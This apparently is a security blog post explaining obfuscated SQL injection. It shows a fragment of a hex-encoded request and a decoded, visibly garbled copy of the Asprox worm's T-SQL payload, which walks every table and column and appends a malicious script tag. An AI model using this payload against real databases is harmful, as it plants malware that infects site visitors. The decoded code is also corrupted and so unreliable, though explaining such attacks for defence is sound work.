Security Street Knowledge
  • Obfuscated SQL Injection
  • Two pictures in one

    Take a look at this paragraph. Can you read what it says? All the letters have been jumbled (mixed). Only the first and last letter of ecah word is in the right place:

    Unisg the icndeblire pweor of the hmuan mnid, aocdcrnig to rseecrah at Cmabrigde Uinervtisy, it dseno’t mttaer in waht oderr the lterets in a wrod are, the olny irpoamtnt tihng is taht the frsit and lsat ltteer be in the rhgit pclae. An atactk can be a taotl mses but you can dceode it and sitll raed it whoutit a pboerlm. Take the extra step to raed the mnid of a hcaekr.


    Unfortunately, cyber security attacks may not be as easy to read as the example above.  The bad guys know that we are getting smarter at identifying their web-based attacks.  Therefore in recent times, they have begun obfuscating their malicious payloads.  The obfuscated payloads are uniquely crafted to fool a web application firewall (WAF) or to simply make it difficult for the trained eye to quickly identify a simple SQL injection attack.

    Now take a look at one of the more common obfuscated SQL injection attacks described as “ASCII HEX Encoded/Binary String Automated SQL Injection Attack”. This is an example of a new and growing trend of SQL Web-worms.


    ASCII HEX Encoded/Binary String











    437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1

    ASCII HEX Encoded/Binary String Automated SQL Injection Attack

    1. The attack injects an iFrame into the Website, which then infects visitors with a malicious JavaScript file called w.js

    2. This is not a virus itself but it will download a malicious binary

    3. Now all the attacker has to do is redirect visitors to infected website through other embedded IFRAMES and XSS SCRIPTS

    4. The initial redirect can be accomplished by regular site visitors to an assumed trusted website or via a link distributed as a sales advertisement within an e-mail.


    Deobfuscated – Asprox SQL Injection Worm(decoded using Burp Suite)

    DECLARE @S CHAR(@SET @S=ÊST(0xDECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select, from sysobjects a,syscolumns b where and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=””></title><script src=”“></script><!–”+[‘+@C+’] where ‘+@C+’ not like ”%”></title><script src=”“></script><!–”’)FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(@));EXì(@S);




    Note: “SQL injection attacks enable malicious users to execute commands or store content in the application’s database.”

  • Comments: Off Category: Uncategorized
  • Tags: , , , , , , , , , , , , , ,

Comments are closed.